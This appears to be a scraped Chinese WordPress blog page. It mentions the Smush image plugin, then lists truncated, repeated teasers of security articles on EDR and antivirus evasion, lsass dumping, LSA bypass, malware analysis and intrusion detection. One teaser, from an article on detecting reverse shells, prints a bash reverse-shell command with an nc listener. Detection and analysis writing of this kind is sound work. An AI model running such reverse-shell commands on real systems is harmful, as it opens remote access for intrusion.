优化图像,打开延迟加载,调整大小,压缩和提高您的Google页面速度,使用令人难以置信的强大且100%免费的WordPress图像扫描器,由WPMU DEV的超级团队带给您!文章源自知更鸟-https://zm
05-04
681
0
WordPress 图片优化和压缩插件:Smush
05-04
681
0
推荐阅读
05-04
681
0
推荐阅读
判断 WordPress 文章中有特定短代码时加载脚本
短代码是WordPress常用的功能,虽然目前已被区块所取代,但还是普遍应用中。有些短代码会用到JS脚本,但又不想全局加载,可以用下面的代码实现,添加短代码时仅在当前页面加载JS脚本
05-04
487
0
专题
(1)篇
WordPress 实用代码
WordPress 实用代码
专题
(0)篇
WordPress 插件
WordPress 插件
专题
(0)篇
Web前端
Web前端
专题
(0)篇
WordPress 常见问题
WordPress 常见问题
AnQuanKeInfo
如何控制.NET CLR使用日志实现EDR规避
0x00 前言
近几年来,研究人员公开了规避端点安全解决方案(如A/V、EDR以及日志记录工具)的各种技术,其中涉及到的方法通常在具体技巧和实现上有所不同,但都
近几年来,研究人员公开了规避端点安全解决方案(如A/V、EDR以及日志记录工具)的各种技术,其中涉及到的方法通常在具体技巧和实现上有所不同,但都
2023-11-251评论
AnQuanKeInfo
Windows渗透基础大全
Windows发展历史
Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微
Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微
2023-11-252评论
AnQuanKeInfo
HIDS-Agent开发之检测反弹shell
介绍
bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 #TCPListener:
nc -nvlp 1234目标机执行后的结果
bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 #TCPListener:
nc -nvlp 1234目标机执行后的结果
2023-11-252评论
AnQuanKeInfo
使用Sysmon和Winlogbeat打造Windows平台的HIDS
介绍
https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysmonSysmon是微软的一款免费的
https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysmonSysmon是微软的一款免费的
2023-11-251评论
AnQuanKeInfo
如何在用户态下绕过LSA保护机制(Part 1)
0x00 前言
2018年,James Forshaw发表了一篇文章,其中简要提到了一种技巧,可以使用管理员权限将任意代码注入PPL中。然而,我觉得这篇文章并没
2018年,James Forshaw发表了一篇文章,其中简要提到了一种技巧,可以使用管理员权限将任意代码注入PPL中。然而,我觉得这篇文章并没
2023-11-251评论
AnQuanKeInfo
记一次反制追踪溯本求源
前言
朋友说自己服务器巨卡,里边放了一堆项目资料,环境也集成一大堆,身为他bb,义不容辞,必须给他看看,本来以为挺简单的,给杀杀毒,清理一下文件就ok了,没想到
朋友说自己服务器巨卡,里边放了一堆项目资料,环境也集成一大堆,身为他bb,义不容辞,必须给他看看,本来以为挺简单的,给杀杀毒,清理一下文件就ok了,没想到
2023-11-251评论
4HOU_新闻
Linux下DDOS攻击木马分析报告
在最近的一次给用户做服务器系统安全检测的过程中发现一台服务器,频繁向外发包,网页打开缓慢,上服务器提取了样本的情况分析如下:1. 样本基本信息2. 样本概述样本
2023-11-250评论
AnQuanKeInfo
攻击检测之cobaltstrike4.3上
1.背景介绍
本文主要是从终端层面(windows日志,sysmon日志)对cobaltstrike4.3版本默认的功能产生的行为进行检测。2.HTMLAppl
本文主要是从终端层面(windows日志,sysmon日志)对cobaltstrike4.3版本默认的功能产生的行为进行检测。2.HTMLAppl
2023-11-251评论
AnQuanKeInfo
基于Linux Namespaces 特性 实现的消音
TL;DR这不是什么新技术,仅仅只是一些利用。
这是一个减少攻击噪音的工具,但同时也会产生其他噪音,但收益大于支出,属于OPSEC一类。
使用Linux Nam
这是一个减少攻击噪音的工具,但同时也会产生其他噪音,但收益大于支出,属于OPSEC一类。
使用Linux Nam
2023-11-250评论
AnQuanKeInfo
应急响应的神兵利器
1.文章概述
本文主要介绍windows以及linux应急响应方面的知识以及排除思路以及笔者日常使用的相关的优秀工具。2.windows篇
windows终端的
本文主要介绍windows以及linux应急响应方面的知识以及排除思路以及笔者日常使用的相关的优秀工具。2.windows篇
windows终端的
2023-11-250评论
AnQuanKeInfo
Smoke Loader 木马病毒分析
Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达
2023-11-240评论
AnQuanKeInfo
攻击检测之cobaltstrike4.3上
1.背景介绍
本文主要是从终端层面(windows日志,sysmon日志)对cobaltstrike4.3版本默认的功能产生的行为进行检测。2.HTMLAppl
本文主要是从终端层面(windows日志,sysmon日志)对cobaltstrike4.3版本默认的功能产生的行为进行检测。2.HTMLAppl
2023-11-242评论
4HOU_新闻
PowerShell技巧——借助kd.exe隐藏进程
0x00 前言Pierre-Alexandre Braeken在SecTor2016上做了一个很棒的演讲——HACK MICROSOFT BY USING MI
2023-11-241评论
AnQuanKeInfo
基于Linux Namespaces 特性 实现的消音
TL;DR这不是什么新技术,仅仅只是一些利用。
这是一个减少攻击噪音的工具,但同时也会产生其他噪音,但收益大于支出,属于OPSEC一类。
使用Linux Nam
这是一个减少攻击噪音的工具,但同时也会产生其他噪音,但收益大于支出,属于OPSEC一类。
使用Linux Nam
2023-11-243评论
AnQuanKeInfo
应急响应的神兵利器
1.文章概述
本文主要介绍windows以及linux应急响应方面的知识以及排除思路以及笔者日常使用的相关的优秀工具。2.windows篇
windows终端的
本文主要介绍windows以及linux应急响应方面的知识以及排除思路以及笔者日常使用的相关的优秀工具。2.windows篇
windows终端的
2023-11-243评论
4HOU_新闻
Linux下DDOS攻击木马分析报告
在最近的一次给用户做服务器系统安全检测的过程中发现一台服务器,频繁向外发包,网页打开缓慢,上服务器提取了样本的情况分析如下:1. 样本基本信息2. 样本概述样本
2023-11-240评论
AnQuanKeInfo
Smoke Loader 木马病毒分析
Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达
2023-11-242评论
AnQuanKeInfo
基于Linux连接器的审计进程事件实现方案
1 引言
主机安全是信息安全纵深防御体系中最贴近业务的安全组件,离得近,看得清,能够及时感知入侵行为。攻击者的绝大多数攻击行为都是以进程的方式呈现,攻击者执行命
主机安全是信息安全纵深防御体系中最贴近业务的安全组件,离得近,看得清,能够及时感知入侵行为。攻击者的绝大多数攻击行为都是以进程的方式呈现,攻击者执行命
2023-11-241评论
AnQuanKeInfo
Smoke Loader 木马病毒分析
Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达
2023-11-243评论
AnQuanKeInfo
转储lsass的方法原理和实现学习
lsass.exe(Local Security Authority Subsystem Service进程空间中,存有着机器的域、本地用户名和密码等重要信息。
2023-11-243评论
AnQuanKeInfo
CVE-2016-6909 Fortigate 防火墙 Cookie 解析漏洞复现及简要分析
0x00.一切开始之前
Fortigate 系列是 Fortinet(飞塔)公司旗下的防火墙产品之一,2016年,Shadow Brokers公开了黑客组织Eq
Fortigate 系列是 Fortinet(飞塔)公司旗下的防火墙产品之一,2016年,Shadow Brokers公开了黑客组织Eq
2023-11-240评论
AnQuanKeInfo
以原生速度在 macOS 上模糊测试 iOS 代码
0x0 概述
随着Apple Silicon Mac的推出,在 Mac 上原生运行 iOS 应用程序成为可能。这归咎于 (1) iPhone 和 Apple S
随着Apple Silicon Mac的推出,在 Mac 上原生运行 iOS 应用程序成为可能。这归咎于 (1) iPhone 和 Apple S
2023-11-240评论
AnQuanKeInfo
在Firefox中有效模糊测试IPC层
火狐内部的进程间通信(IPC)层是火狐多进程安全架构的基石。因此,消除IPC层中的安全漏洞仍然至关重要。在这篇博文中,我们调查并描述了Firefox用于执行
2023-11-244评论
AnQuanKeInfo
Antivirus Bypass(二)基于CreateProcess函数
本篇文章是Bypass思路系列文章的第二篇,后续会持续更新有关Bypass的思路
因为工作原因,文章断断续续,时间线上会存在差异,思路及代码可行性仅供参考。
若
因为工作原因,文章断断续续,时间线上会存在差异,思路及代码可行性仅供参考。
若
2023-11-240评论
AnQuanKeInfo
Smoke Loader 木马病毒分析
Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达
2023-11-241评论